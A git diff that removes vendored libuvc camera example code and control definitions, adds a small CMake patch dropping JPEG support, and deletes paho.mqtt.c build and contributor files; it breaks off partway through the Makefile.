-  cvNamedWindow("Test", CV_WINDOW_AUTOSIZE);
-  cvShowImage("Test", cvImg);
-  cvWaitKey(10);
-
-  cvReleaseImageHeader(&cvImg);
-
-  uvc_free_frame(bgr);
-}
-
-int main(int argc, char **argv) {
-  uvc_context_t *ctx;
-  uvc_error_t res;
-  uvc_device_t *dev;
-  uvc_device_handle_t *devh;
-  uvc_stream_ctrl_t ctrl;
-
-  res = uvc_init(&ctx, NULL);
-
-  if (res < 0) {
-    uvc_perror(res, "uvc_init");
-    return res;
-  }
-
-  puts("UVC initialized");
-
-  res = uvc_find_device(
-      ctx, &dev,
-      0, 0, NULL);
-
-  if (res < 0) {
-    uvc_perror(res, "uvc_find_device");
-  } else {
-    puts("Device found");
-
-    res = uvc_open(dev, &devh);
-
-    if (res < 0) {
-      uvc_perror(res, "uvc_open");
-    } else {
-      puts("Device opened");
-
-      uvc_print_diag(devh, stderr);
-
-      res = uvc_get_stream_ctrl_format_size(
-          devh, &ctrl, UVC_FRAME_FORMAT_YUYV, 640, 480, 30
-      );
-
-      uvc_print_stream_ctrl(&ctrl, stderr);
-
-      if (res < 0) {
-        uvc_perror(res, "get_mode");
-      } else {
-        res = uvc_start_streaming(devh, &ctrl, cb, 12345, 0);
-
-        if (res < 0) {
-          uvc_perror(res, "start_streaming");
-        } else {
-          puts("Streaming for 10 seconds...");
-          uvc_error_t resAEMODE = uvc_set_ae_mode(devh, 1);
-          uvc_perror(resAEMODE, "set_ae_mode");
-          int i;
-          for (i = 1; i <= 10; i++) {
-            /* uvc_error_t resPT = uvc_set_pantilt_abs(devh, i * 20 * 3600, 0); */
-            /* uvc_perror(resPT, "set_pt_abs"); */
-            uvc_error_t resEXP = uvc_set_exposure_abs(devh, 20 + i * 5);
-            uvc_perror(resEXP, "set_exp_abs");
-            
-            sleep(1);
-          }
-          sleep(10);
-          uvc_stop_streaming(devh);
-	  puts("Done streaming.");
-        }
-      }
-
-      uvc_close(devh);
-      puts("Device closed");
-    }
-
-    uvc_unref_device(dev);
-  }
-
-  uvc_exit(ctx);
-  puts("UVC exited");
-
-  return 0;
-}
-
diff --git a/thirdparty/libuvc-0.0.6/standard-units.yaml b/thirdparty/libuvc-0.0.6/standard-units.yaml
deleted file mode 100644
index 198c401..0000000
--- a/thirdparty/libuvc-0.0.6/standard-units.yaml
+++ /dev/null
@@ -1,518 +0,0 @@
-units:
-  camera_terminal:
-    type: standard
-    description: Standard camera input terminal (captures images from sensor)
-    control_prefix: CT
-    controls:
-      scanning_mode:
-        control: SCANNING_MODE
-        length: 1
-        fields:
-          mode:
-            type: int
-            position: 0
-            length: 1
-            doc: '0: interlaced, 1: progressive'
-      ae_mode:
-        control: AE_MODE
-        length: 1
-        fields:
-          mode:
-            type: int
-            position: 0
-            length: 1
-            doc: '1: manual mode; 2: auto mode; 4: shutter priority mode; 8: aperture
-              priority mode'
-        doc:
-          get: |-
-            @brief Reads camera's auto-exposure mode.
-
-            See uvc_set_ae_mode() for a description of the available modes.
-          set: |-
-            @brief Sets camera's auto-exposure mode.
-
-            Cameras may support any of the following AE modes:
-             * UVC_AUTO_EXPOSURE_MODE_MANUAL (1) - manual exposure time, manual iris
-             * UVC_AUTO_EXPOSURE_MODE_AUTO (2) - auto exposure time, auto iris
-             * UVC_AUTO_EXPOSURE_MODE_SHUTTER_PRIORITY (4) - manual exposure time, auto iris
-             * UVC_AUTO_EXPOSURE_MODE_APERTURE_PRIORITY (8) - auto exposure time, manual iris
-
-            Most cameras provide manual mode and aperture priority mode.
-      ae_priority:
-        control: AE_PRIORITY
-        length: 1
-        fields:
-          priority:
-            type: int
-            position: 0
-            length: 1
-            doc: '0: frame rate must remain constant; 1: frame rate may be varied
-              for AE purposes'
-        doc:
-          get: |-
-            @brief Checks whether the camera may vary the frame rate for exposure control reasons.
-            See uvc_set_ae_priority() for a description of the `priority` field.
-          set: |-
-            @brief Chooses whether the camera may vary the frame rate for exposure control reasons.
-            A `priority` value of zero means the camera may not vary its frame rate. A value of 1
-            means the frame rate is variable. This setting has no effect outside of the `auto` and
-            `shutter_priority` auto-exposure modes.
-      exposure_abs:
-        control: EXPOSURE_TIME_ABSOLUTE
-        length: 4
-        fields:
-          time:
-            type: int
-            position: 0
-            length: 4
-            doc: ''
-        doc:
-          get: |-
-            @brief Gets the absolute exposure time.
-
-            See uvc_set_exposure_abs() for a description of the `time` field.
-          set: |-
-            @brief Sets the absolute exposure time.
-
-            The `time` parameter should be provided in units of 0.0001 seconds (e.g., use the value 100
-            for a 10ms exposure period). Auto exposure should be set to `manual` or `shutter_priority`
-            before attempting to change this setting.
-      exposure_rel:
-        control: EXPOSURE_TIME_RELATIVE
-        length: 1
-        fields:
-          step:
-            type: int
-            position: 0
-            length: 1
-            signed: true
-            doc: number of steps by which to change the exposure time, or zero to
-              set the default exposure time
-        doc: '@brief {gets_sets} the exposure time relative to the current setting.'
-      focus_abs:
-        control: FOCUS_ABSOLUTE
-        length: 2
-        fields:
-          focus:
-            type: int
-            position: 0
-            length: 2
-            doc: focal target distance in millimeters
-        doc: '@brief {gets_sets} the distance at which an object is optimally focused.'
-      focus_rel:
-        control: FOCUS_RELATIVE
-        length: 2
-        fields:
-          focus_rel:
-            type: int
-            position: 0
-            length: 1
-            signed: true
-            doc: TODO
-          speed:
-            type: int
-            position: 1
-            length: 1
-            doc: TODO
-      focus_simple_range:
-        control: FOCUS_SIMPLE
-        length: 1
-        fields:
-          focus:
-            type: int
-            position: 0
-            length: 1
-            doc: TODO
-      focus_auto:
-        control: FOCUS_AUTO
-        length: 1
-        fields:
-          state:
-            type: int
-            position: 0
-            length: 1
-            doc: TODO
-      iris_abs:
-        control: IRIS_ABSOLUTE
-        length: 2
-        fields:
-          iris:
-            type: int
-            position: 0
-            length: 2
-            doc: TODO
-      iris_rel:
-        control: IRIS_RELATIVE
-        length: 1
-        fields:
-          iris_rel:
-            type: int
-            position: 0
-            length: 1
-            doc: TODO
-      zoom_abs:
-        control: ZOOM_ABSOLUTE
-        length: 2
-        fields:
-          focal_length:
-            type: int
-            position: 0
-            length: 2
-            doc: TODO
-      zoom_rel:
-        control: ZOOM_RELATIVE
-        length: 3
-        fields:
-          zoom_rel:
-            type: int
-            position: 0
-            length: 1
-            signed: true
-            doc: TODO
-          digital_zoom:
-            type: int
-            position: 1
-            length: 1
-            doc: TODO
-          speed:
-            type: int
-            position: 2
-            length: 1
-            doc: TODO
-      pantilt_abs:
-        control: PANTILT_ABSOLUTE
-        length: 8
-        fields:
-          pan:
-            type: int
-            position: 0
-            length: 4
-            signed: true
-            doc: TODO
-          tilt:
-            type: int
-            position: 4
-            length: 4
-            signed: true
-            doc: TODO
-      pantilt_rel:
-        control: PANTILT_RELATIVE
-        length: 4
-        fields:
-          pan_rel:
-            type: int
-            position: 0
-            length: 1
-            signed: true
-            doc: TODO
-          pan_speed:
-            type: int
-            position: 1
-            length: 1
-            doc: TODO
-          tilt_rel:
-            type: int
-            position: 2
-            length: 1
-            signed: true
-            doc: TODO
-          tilt_speed:
-            type: int
-            position: 3
-            length: 1
-            doc: TODO
-      roll_abs:
-        control: ROLL_ABSOLUTE
-        length: 2
-        fields:
-          roll:
-            type: int
-            position: 0
-            length: 2
-            signed: true
-            doc: TODO
-      roll_rel:
-        control: ROLL_RELATIVE
-        length: 2
-        fields:
-          roll_rel:
-            type: int
-            position: 0
-            length: 1
-            signed: true
-            doc: TODO
-          speed:
-            type: int
-            position: 1
-            length: 1
-            doc: TODO
-      privacy:
-        control: PRIVACY
-        length: 1
-        fields:
-          privacy:
-            type: int
-            position: 0
-            length: 1
-            doc: TODO
-      digital_window:
-        control: DIGITAL_WINDOW
-        length: 12
-        fields:
-          window_top:
-            type: int
-            position: 0
-            length: 2
-            doc: TODO
-          window_left:
-            type: int
-            position: 2
-            length: 2
-            doc: TODO
-          window_bottom:
-            type: int
-            position: 4
-            length: 2
-            doc: TODO
-          window_right:
-            type: int
-            position: 6
-            length: 2
-            doc: TODO
-          num_steps:
-            type: int
-            position: 8
-            length: 2
-            doc: TODO
-          num_steps_units:
-            type: int
-            position: 10
-            length: 2
-            doc: TODO
-      digital_roi:
-        control: REGION_OF_INTEREST
-        length: 10
-        fields:
-          roi_top:
-            type: int
-            position: 0
-            length: 2
-            doc: TODO
-          roi_left:
-            type: int
-            position: 2
-            length: 2
-            doc: TODO
-          roi_bottom:
-            type: int
-            position: 4
-            length: 2
-            doc: TODO
-          roi_right:
-            type: int
-            position: 6
-            length: 2
-            doc: TODO
-          auto_controls:
-            type: int
-            position: 8
-            length: 2
-            doc: TODO
-  processing_unit:
-    type: standard
-    description: Standard processing unit (processes images between other units)
-    control_prefix: PU
-    controls:
-      backlight_compensation:
-        control: BACKLIGHT_COMPENSATION
-        length: 2
-        fields:
-          backlight_compensation:
-            type: int
-            position: 0
-            length: 2
-            doc: device-dependent backlight compensation mode; zero means backlight
-              compensation is disabled
-      brightness:
-        control: BRIGHTNESS
-        length: 2
-        fields:
-          brightness:
-            type: int
-            position: 0
-            length: 2
-            signed: true
-            doc: TODO
-      contrast:
-        control: CONTRAST
-        length: 2
-        fields:
-          contrast:
-            type: int
-            position: 0
-            length: 2
-            doc: TODO
-      contrast_auto:
-        control: CONTRAST_AUTO
-        length: 1
-        fields:
-          contrast_auto:
-            type: int
-            position: 0
-            length: 1
-            doc: TODO
-      gain:
-        control: GAIN
-        length: 2
-        fields:
-          gain:
-            type: int
-            position: 0
-            length: 2
-            doc: TODO
-      power_line_frequency:
-        control: POWER_LINE_FREQUENCY
-        length: 1
-        fields:
-          power_line_frequency:
-            type: int
-            position: 0
-            length: 1
-            doc: TODO
-      hue:
-        control: HUE
-        length: 2
-        fields:
-          hue:
-            type: int
-            position: 0
-            length: 2
-            signed: true
-            doc: TODO
-      hue_auto:
-        control: HUE_AUTO
-        length: 1
-        fields:
-          hue_auto:
-            type: int
-            position: 0
-            length: 1
-            doc: TODO
-      saturation:
-        control: SATURATION
-        length: 2
-        fields:
-          saturation:
-            type: int
-            position: 0
-            length: 2
-            doc: TODO
-      sharpness:
-        control: SHARPNESS
-        length: 2
-        fields:
-          sharpness:
-            type: int
-            position: 0
-            length: 2
-            doc: TODO
-      gamma:
-        control: GAMMA
-        length: 2
-        fields:
-          gamma:
-            type: int
-            position: 0
-            length: 2
-            doc: TODO
-      white_balance_temperature:
-        control: WHITE_BALANCE_TEMPERATURE
-        length: 2
-        fields:
-          temperature:
-            type: int
-            position: 0
-            length: 2
-            doc: TODO
-      white_balance_temperature_auto:
-        control: WHITE_BALANCE_TEMPERATURE_AUTO
-        length: 1
-        fields:
-          temperature_auto:
-            type: int
-            position: 0
-            length: 1
-            doc: TODO
-      white_balance_component:
-        control: WHITE_BALANCE_COMPONENT
-        length: 4
-        fields:
-          blue:
-            type: int
-            position: 0
-            length: 2
-            doc: TODO
-          red:
-            type: int
-            position: 2
-            length: 2
-            doc: TODO
-      white_balance_component_auto:
-        control: WHITE_BALANCE_COMPONENT_AUTO
-        length: 1
-        fields:
-          white_balance_component_auto:
-            type: int
-            position: 0
-            length: 1
-            doc: TODO
-      digital_multiplier:
-        control: DIGITAL_MULTIPLIER
-        length: 2
-        fields:
-          multiplier_step:
-            type: int
-            position: 0
-            length: 2
-            doc: TODO
-      digital_multiplier_limit:
-        control: DIGITAL_MULTIPLIER_LIMIT
-        length: 2
-        fields:
-          multiplier_step:
-            type: int
-            position: 0
-            length: 2
-            doc: TODO
-      analog_video_standard:
-        control: ANALOG_VIDEO_STANDARD
-        length: 1
-        fields:
-          video_standard:
-            type: int
-            position: 0
-            length: 1
-            doc: TODO
-      analog_video_lock_status:
-        control: ANALOG_LOCK_STATUS
-        length: 1
-        fields:
-          status:
-            type: int
-            position: 0
-            length: 1
-            doc: TODO
-  selector_unit:
-    type: standard
-    description: Standard selector unit (controls connectivity between other units)
-    control_prefix: SU
-    controls:
-      input_select:
-        control: INPUT_SELECT
-        length: 1
-        fields:
-          selector:
-            type: int
-            position: 0
-            length: 1
-            doc: TODO
diff --git a/thirdparty/libuvc/libuvc.patch b/thirdparty/libuvc/libuvc.patch
new file mode 100644
index 0000000..1d30e37
--- /dev/null
+++ b/thirdparty/libuvc/libuvc.patch
@@ -0,0 +1,44 @@
+diff -rupN orig/CMakeLists.txt patched/CMakeLists.txt
+--- orig/CMakeLists.txt	2017-09-21 04:39:28.000000000 +0200
++++ patched/CMakeLists.txt	2019-09-11 13:59:58.000000000 +0200
+@@ -22,24 +22,6 @@ set(libuvc_URL "https://github.com/ktoss
+ find_package(PkgConfig)
+ pkg_check_modules(LIBUSB libusb-1.0)
+ 
+-# Try to find JPEG using a module or pkg-config. If that doesn't work, search for the header.
+-find_package(jpeg QUIET)
+-if(JPEG_FOUND)
+-  set(JPEG_LINK_FLAGS ${JPEG_LIBRARIES})
+-else()
+-  pkg_check_modules(JPEG QUIET libjpeg)
+-  if(JPEG_FOUND)
+-      set(JPEG_INCLUDE_DIR ${JPEG_INCLUDE_DIRS})
+-      set(JPEG_LINK_FLAGS ${JPEG_LDFLAGS})
+-  else()
+-    find_path(JPEG_INCLUDE_DIR jpeglib.h)
+-    if(JPEG_INCLUDE_DIR)
+-      set(JPEG_FOUND ON)
+-      set(JPEG_LINK_FLAGS -ljpeg)
+-    endif()
+-  endif()
+-endif()
+-
+ include(GNUInstallDirs)
+ 
+ SET(CMAKE_C_FLAGS_DEBUG "-g -DUVC_DEBUGGING")
+@@ -57,14 +39,7 @@ include_directories(
+   ${LIBUSB_INCLUDE_DIRS}
+ )
+ 
+-if(JPEG_FOUND)
+-  message(STATUS "Building libuvc with JPEG support.")
+-  include_directories(${JPEG_INCLUDE_DIR})
+-  SET(LIBUVC_HAS_JPEG TRUE)
+-  SET(SOURCES ${SOURCES} src/frame-mjpeg.c)
+-else()
+-  message(WARNING "JPEG not found. libuvc will not support JPEG decoding.")
+-endif()
++message(WARNING "libuvc will not support JPEG decoding.")
+ 
+ if(${CMAKE_BUILD_TARGET} MATCHES "Shared")
+   set(BUILD_UVC_SHARED TRUE)
diff --git a/thirdparty/paho.mqtt.c/.gitignore b/thirdparty/paho.mqtt.c/.gitignore
deleted file mode 100644
index 5b2b31f..0000000
--- a/thirdparty/paho.mqtt.c/.gitignore
+++ /dev/null
@@ -1,6 +0,0 @@
-/dep/
-/build/
-/build.paho/
-*.swp
-*.pyc
-/build.paho
diff --git a/thirdparty/paho.mqtt.c/.gitreview b/thirdparty/paho.mqtt.c/.gitreview
deleted file mode 100644
index 2d16be7..0000000
--- a/thirdparty/paho.mqtt.c/.gitreview
+++ /dev/null
@@ -1,5 +0,0 @@
-[gerrit]
-host=git.eclipse.org
-port=29418
-project=paho/org.eclipse.paho.mqtt.c
-defaultbranch=develop
diff --git a/thirdparty/paho.mqtt.c/.pydevproject b/thirdparty/paho.mqtt.c/.pydevproject
deleted file mode 100644
index 40e9f40..0000000
--- a/thirdparty/paho.mqtt.c/.pydevproject
+++ /dev/null
@@ -1,5 +0,0 @@
-<?xml version="1.0" encoding="UTF-8" standalone="no"?>
-<?eclipse-pydev version="1.0"?><pydev_project>
-<pydev_property name="org.python.pydev.PYTHON_PROJECT_INTERPRETER">Default</pydev_property>
-<pydev_property name="org.python.pydev.PYTHON_PROJECT_VERSION">python 2.7</pydev_property>
-</pydev_project>
diff --git a/thirdparty/paho.mqtt.c/CMakeLists.txt b/thirdparty/paho.mqtt.c/CMakeLists.txt
deleted file mode 100644
index 1c2593b..0000000
--- a/thirdparty/paho.mqtt.c/CMakeLists.txt
+++ /dev/null
@@ -1,86 +0,0 @@
-#*******************************************************************************
-#  Copyright (c) 2015, 2017 logi.cals GmbH and others
-#
-#  All rights reserved. This program and the accompanying materials
-#  are made available under the terms of the Eclipse Public License v1.0
-#  and Eclipse Distribution License v1.0 which accompany this distribution.
-#
-#  The Eclipse Public License is available at
-#     http://www.eclipse.org/legal/epl-v10.html
-#  and the Eclipse Distribution License is available at
-#    http://www.eclipse.org/org/documents/edl-v10.php.
-#
-#  Contributors:
-#     Rainer Poisel - initial version
-#     Genis Riera Perez - Add support for building debian package
-#*******************************************************************************/
-
-# Note: on OS X you should install XCode and the associated command-line tools
-
-CMAKE_MINIMUM_REQUIRED(VERSION 2.8.4)
-PROJECT("paho" C)
-MESSAGE(STATUS "CMake version: " ${CMAKE_VERSION})
-MESSAGE(STATUS "CMake system name: " ${CMAKE_SYSTEM_NAME})
-
-SET(CMAKE_SCRIPTS "${CMAKE_SOURCE_DIR}/cmake")
-SET(CMAKE_MODULE_PATH "${CMAKE_SOURCE_DIR}/cmake/modules")
-
-## build settings
-SET(PAHO_VERSION_MAJOR 1)
-SET(PAHO_VERSION_MINOR 2)
-SET(PAHO_VERSION_PATCH 0)
-SET(CLIENT_VERSION ${PAHO_VERSION_MAJOR}.${PAHO_VERSION_MINOR}.${PAHO_VERSION_PATCH})
-
-INCLUDE(GNUInstallDirs)
-
-STRING(TIMESTAMP BUILD_TIMESTAMP UTC)
-MESSAGE(STATUS "Timestamp is ${BUILD_TIMESTAMP}")
-
-IF(WIN32)
-  ADD_DEFINITIONS(-D_CRT_SECURE_NO_DEPRECATE -DWIN32_LEAN_AND_MEAN -MD)
-ELSEIF(${CMAKE_SYSTEM_NAME} STREQUAL "Darwin")
-  ADD_DEFINITIONS(-DOSX)
-ENDIF()
-
-## build options
-SET(PAHO_WITH_SSL TRUE CACHE BOOL "Flag that defines whether to build ssl-enabled binaries too. ")
-SET(PAHO_BUILD_STATIC TRUE CACHE BOOL "Build static library")
-SET(PAHO_BUILD_DOCUMENTATION FALSE CACHE BOOL "Create and install the HTML based API documentation (requires Doxygen)")
-SET(PAHO_BUILD_SAMPLES FALSE CACHE BOOL "Build sample programs")
-SET(PAHO_BUILD_DEB_PACKAGE FALSE CACHE BOOL "Build debian package")
-SET(PAHO_ENABLE_TESTING FALSE CACHE BOOL "Build tests and run")
-
-ADD_SUBDIRECTORY(src)
-IF(PAHO_BUILD_SAMPLES)
-    ADD_SUBDIRECTORY(src/samples)
-ENDIF()
-
-IF(PAHO_BUILD_DOCUMENTATION)
-    ADD_SUBDIRECTORY(doc)
-ENDIF()
-
-### packaging settings
-IF (WIN32)
-    SET(CPACK_GENERATOR "ZIP")
-ELSEIF(PAHO_BUILD_DEB_PACKAGE)
-    SET(CPACK_GENERATOR "DEB")
-    CONFIGURE_FILE(${CMAKE_SCRIPTS}/CPackDebConfig.cmake.in
-        ${CMAKE_BINARY_DIR}/CPackDebConfig.cmake @ONLY)
-    SET(CPACK_PROJECT_CONFIG_FILE ${CMAKE_BINARY_DIR}/CPackDebConfig.cmake)
-    ADD_SUBDIRECTORY(debian)
-ELSE()
-    SET(CPACK_GENERATOR "TGZ")
-ENDIF()
-
-SET(CPACK_PACKAGE_VERSION_MAJOR ${PAHO_VERSION_MAJOR})
-SET(CPACK_PACKAGE_VERSION_MINOR ${PAHO_VERSION_MINOR})
-SET(CPACK_PACKAGE_VERSION_PATCH ${PAHO_VERSION_PATCH})
-INCLUDE(CPack)
-
-IF(PAHO_ENABLE_TESTING)
-    ENABLE_TESTING()
-    INCLUDE_DIRECTORIES(test src)
-    ADD_SUBDIRECTORY(test)
-ELSE()
-    INCLUDE_DIRECTORIES(src)
-ENDIF()
diff --git a/thirdparty/paho.mqtt.c/CONTRIBUTING.md b/thirdparty/paho.mqtt.c/CONTRIBUTING.md
deleted file mode 100644
index 1ebe9d1..0000000
--- a/thirdparty/paho.mqtt.c/CONTRIBUTING.md
+++ /dev/null
@@ -1,66 +0,0 @@
-# Contributing to Paho

-

-Thanks for your interest in this project!

-

-You can contribute bugfixes and new features by sending pull requests through GitHub.

-

-## Legal

-

-In order for your contribution to be accepted, it must comply with the Eclipse Foundation IP policy.

-

-Please read the [Eclipse Foundation policy on accepting contributions via Git](http://wiki.eclipse.org/Development_Resources/Contributing_via_Git).

-

-1. Sign the [Eclipse CLA](http://www.eclipse.org/legal/CLA.php)

-  1. Register for an Eclipse Foundation User ID. You can register [here](https://dev.eclipse.org/site_login/createaccount.php).

-  2. Log into the [Projects Portal](https://projects.eclipse.org/), and click on the '[Eclipse CLA](https://projects.eclipse.org/user/sign/cla)' link.

-2. Go to your [account settings](https://dev.eclipse.org/site_login/myaccount.php#open_tab_accountsettings) and add your GitHub username to your account.

-3. Make sure that you _sign-off_ your Git commits in the following format:

-  ``` Signed-off-by: John Smith <johnsmith@nowhere.com> ``` This is usually at the bottom of the commit message. You can automate this by adding the '-s' flag when you make the commits. e.g.   ```git commit -s -m "Adding a cool feature"```

-4. Ensure that the email address that you make your commits with is the same one you used to sign up to the Eclipse Foundation website with.

-

-## Contributing a change

-

-1. [Fork the repository on GitHub](https://github.com/eclipse/paho.mqtt.c/fork)

-2. Clone the forked repository onto your computer: ``` git clone https://github.com/<your username>/paho.mqtt.c.git ```

-3. Create a new branch from the latest ```develop``` branch with ```git checkout -b YOUR_BRANCH_NAME origin/develop```

-4. Make your changes

-5. If developing a new feature, make sure to include JUnit tests.

-6. Ensure that all new and existing tests pass.

-7. Commit the changes into the branch: ``` git commit -s ``` Make sure that your commit message is meaningful and describes your changes correctly.

-8. If you have a lot of commits for the change, squash them into a single / few commits.

-9. Push the changes in your branch to your forked repository.

-10. Finally, go to [https://github.com/eclipse/paho.mqtt.c](https://github.com/eclipse/paho.mqtt.c) and create a pull request from your "YOUR_BRANCH_NAME" branch to the ```develop``` one to request review and merge of the commits in your pushed branch.

-

-

-What happens next depends on the content of the patch. If it is 100% authored

-by the contributor and is less than 1000 lines (and meets the needs of the

-project), then it can be pulled into the main repository. If not, more steps

-are required. These are detailed in the

-[legal process poster](http://www.eclipse.org/legal/EclipseLegalProcessPoster.pdf).

-

-

-

-## Developer resources:

-

-

-Information regarding source code management, builds, coding standards, and more.

-

-- [https://projects.eclipse.org/projects/iot.paho/developer](https://projects.eclipse.org/projects/iot.paho/developer)

-

-Contact:

---------

-

-Contact the project developers via the project's development

-[mailing list](https://dev.eclipse.org/mailman/listinfo/paho-dev).

-

-Search for bugs:

-----------------

-

-This project uses GitHub Issues here: [github.com/eclipse/paho.mqtt.c/issues](https://github.com/eclipse/paho.mqtt.c/issues) to track ongoing development and issues.

-

-Create a new bug:

------------------

-

-Be sure to search for existing bugs before you create another one. Remember that contributions are always welcome!

-

-- [Create new Paho bug](https://github.com/eclipse/paho.mqtt.c/issues/new)

diff --git a/thirdparty/paho.mqtt.c/Makefile b/thirdparty/paho.mqtt.c/Makefile
deleted file mode 100755
index 63d745f..0000000
--- a/thirdparty/paho.mqtt.c/Makefile
+++ /dev/null
@@ -1,283 +0,0 @@
-#*******************************************************************************
-#  Copyright (c) 2009, 2017 IBM Corp.
-#
-#  All rights reserved. This program and the accompanying materials
-#  are made available under the terms of the Eclipse Public License v1.0
-#  and Eclipse Distribution License v1.0 which accompany this distribution.
-#
-#  The Eclipse Public License is available at
-#     http://www.eclipse.org/legal/epl-v10.html
-#  and the Eclipse Distribution License is available at
-#    http://www.eclipse.org/org/documents/edl-v10.php.
-#
-#  Contributors:
-#     Ian Craggs - initial API and implementation and/or initial documentation
-#     Allan Stockdill-Mander - SSL updates
-#     Andy Piper - various fixes
-#     Ian Craggs - OSX build
-#     Rainer Poisel - support for multi-core builds and cross-compilation
-#*******************************************************************************/
-
-# Note: on OS X you should install XCode and the associated command-line tools
-
-SHELL = /bin/sh
-.PHONY: clean, mkdir, install, uninstall, html
-
-ifndef release.version
-  release.version = 1.2.0
-endif
-
-# determine current platform
-BUILD_TYPE ?= debug
-ifeq ($(OS),Windows_NT)
-	OSTYPE ?= $(OS)
-	MACHINETYPE ?= $(PROCESSOR_ARCHITECTURE)
-else
-	OSTYPE ?= $(shell uname -s)
-	MACHINETYPE ?= $(shell uname -m)
-	build.level = $(shell date)
-endif # OS
-ifeq ($(OSTYPE),linux)
-	OSTYPE = Linux
-endif
-
-# assume this is normally run in the main Paho directory
-ifndef srcdir
-  srcdir = src
-endif
-
-ifndef blddir
-  blddir = build/output
-endif
-
-ifndef blddir_work
-  blddir_work = build
-endif
-
-ifndef docdir
-  docdir = $(blddir)/doc
-endif
-
-ifndef docdir_work
-  docdir_work = $(blddir)/../doc
-endif
-
-ifndef prefix
-	prefix = /usr/local
-endif
-
-ifndef exec_prefix
-	exec_prefix = ${prefix}
-endif
-
-bindir = $(exec_prefix)/bin
-includedir = $(prefix)/include
-libdir = $(exec_prefix)/lib
-
-SOURCE_FILES = $(wildcard $(srcdir)/*.c)
-SOURCE_FILES_C = $(filter-out $(srcdir)/MQTTAsync.c $(srcdir)/MQTTVersion.c $(srcdir)/SSLSocket.c, $(SOURCE_FILES))
-SOURCE_FILES_CS = $(filter-out $(srcdir)/MQTTAsync.c $(srcdir)/MQTTVersion.c, $(SOURCE_FILES))
-SOURCE_FILES_A = $(filter-out $(srcdir)/MQTTClient.c $(srcdir)/MQTTVersion.c $(srcdir)/SSLSocket.c, $(SOURCE_FILES))
-SOURCE_FILES_AS = $(filter-out $(srcdir)/MQTTClient.c $(srcdir)/MQTTVersion.c, $(SOURCE_FILES))
-
-HEADERS = $(srcdir)/*.h
-HEADERS_C = $(filter-out $(srcdir)/MQTTAsync.h, $(HEADERS))
-HEADERS_A = $(HEADERS)
-
-SAMPLE_FILES_C = paho_cs_pub paho_cs_sub MQTTClient_publish MQTTClient_publish_async MQTTClient_subscribe
-SYNC_SAMPLES = ${addprefix ${blddir}/samples/,${SAMPLE_FILES_C}}
-
-SAMPLE_FILES_A = paho_c_pub paho_c_sub MQTTAsync_subscribe MQTTAsync_publish
-ASYNC_SAMPLES = ${addprefix ${blddir}/samples/,${SAMPLE_FILES_A}}
-
-TEST_FILES_C = test1 test2 sync_client_test test_mqtt4sync
-SYNC_TESTS = ${addprefix ${blddir}/test/,${TEST_FILES_C}}
-
-TEST_FILES_CS = test3
-SYNC_SSL_TESTS = ${addprefix ${blddir}/test/,${TEST_FILES_CS}}
-
-TEST_FILES_A = test4 test9 test_mqtt4async
-ASYNC_TESTS = ${addprefix ${blddir}/test/,${TEST_FILES_A}}
-
-TEST_FILES_AS = test5
-ASYNC_SSL_TESTS = ${addprefix ${blddir}/test/,${TEST_FILES_AS}}
-
-# The names of the four different libraries to be built
-MQTTLIB_C = paho-mqtt3c
-MQTTLIB_CS = paho-mqtt3cs
-MQTTLIB_A = paho-mqtt3a
-MQTTLIB_AS = paho-mqtt3as
-
-CC ?= gcc
-
-ifndef INSTALL
-INSTALL = install
-endif
-INSTALL_PROGRAM = $(INSTALL)
-INSTALL_DATA =  $(INSTALL) -m 644
-DOXYGEN_COMMAND = doxygen
-
-MAJOR_VERSION = 1
-MINOR_VERSION = 0
-VERSION = ${MAJOR_VERSION}.${MINOR_VERSION}
-
-MQTTLIB_C_TARGET = ${blddir}/lib${MQTTLIB_C}.so.${VERSION}
-MQTTLIB_CS_TARGET = ${blddir}/lib${MQTTLIB_CS}.so.${VERSION}
-MQTTLIB_A_TARGET = ${blddir}/lib${MQTTLIB_A}.so.${VERSION}
-MQTTLIB_AS_TARGET = ${blddir}/lib${MQTTLIB_AS}.so.${VERSION}
-MQTTVERSION_TARGET = ${blddir}/MQTTVersion
-
-CCFLAGS_SO = -g -fPIC $(CFLAGS) -Os -Wall -fvisibility=hidden -I$(blddir_work)
-FLAGS_EXE = $(LDFLAGS) -I ${srcdir} -lpthread -L ${blddir}
-FLAGS_EXES = $(LDFLAGS) -I ${srcdir} ${START_GROUP} -lpthread -lssl -lcrypto ${END_GROUP} -L ${blddir}
-
-LDCONFIG ?= /sbin/ldconfig
-LDFLAGS_C = $(LDFLAGS) -shared -Wl,-init,$(MQTTCLIENT_INIT) -lpthread
-LDFLAGS_CS = $(LDFLAGS) -shared $(START_GROUP) -lpthread $(EXTRA_LIB) -lssl -lcrypto $(END_GROUP) -Wl,-init,$(MQTTCLIENT_INIT)
-LDFLAGS_A = $(LDFLAGS) -shared -Wl,-init,$(MQTTASYNC_INIT) -lpthread
-LDFLAGS_AS = $(LDFLAGS) -shared $(START_GROUP) -lpthread $(EXTRA_LIB) -lssl -lcrypto $(END_GROUP) -Wl,-init,$(MQTTASYNC_INIT)
-
-SED_COMMAND = sed \
-    -e "s/@CLIENT_VERSION@/${release.version}/g" \
-    -e "s/@BUILD_TIMESTAMP@/${build.level}/g"
-
-ifeq ($(OSTYPE),Linux)
-
-MQTTCLIENT_INIT = MQTTClient_init
-MQTTASYNC_INIT = MQTTAsync_init
-START_GROUP = -Wl,--start-group
-END_GROUP = -Wl,--end-group
-
-EXTRA_LIB = -ldl
-
-LDFLAGS_C += -Wl,-soname,lib$(MQTTLIB_C).so.${MAJOR_VERSION}
-LDFLAGS_CS += -Wl,-soname,lib$(MQTTLIB_CS).so.${MAJOR_VERSION} -Wl,-no-whole-archive
-LDFLAGS_A += -Wl,-soname,lib${MQTTLIB_A}.so.${MAJOR_VERSION}
-LDFLAGS_AS += -Wl,-soname,lib${MQTTLIB_AS}.so.${MAJOR_VERSION} -Wl,-no-whole-archive
-
-else ifeq ($(OSTYPE),Darwin)
-
-MQTTCLIENT_INIT = _MQTTClient_init
-MQTTASYNC_INIT = _MQTTAsync_init
-START_GROUP =
-END_GROUP =
-
-EXTRA_LIB = -ldl
-
-CCFLAGS_SO += -Wno-deprecated-declarations -DOSX -I /usr/local/opt/openssl/include
-LDFLAGS_C += -Wl,-install_name,lib$(MQTTLIB_C).so.${MAJOR_VERSION}
-LDFLAGS_CS += -Wl,-install_name,lib$(MQTTLIB_CS).so.${MAJOR_VERSION} -L /usr/local/opt/openssl/lib
-LDFLAGS_A += -Wl,-install_name,lib${MQTTLIB_A}.so.${MAJOR_VERSION}
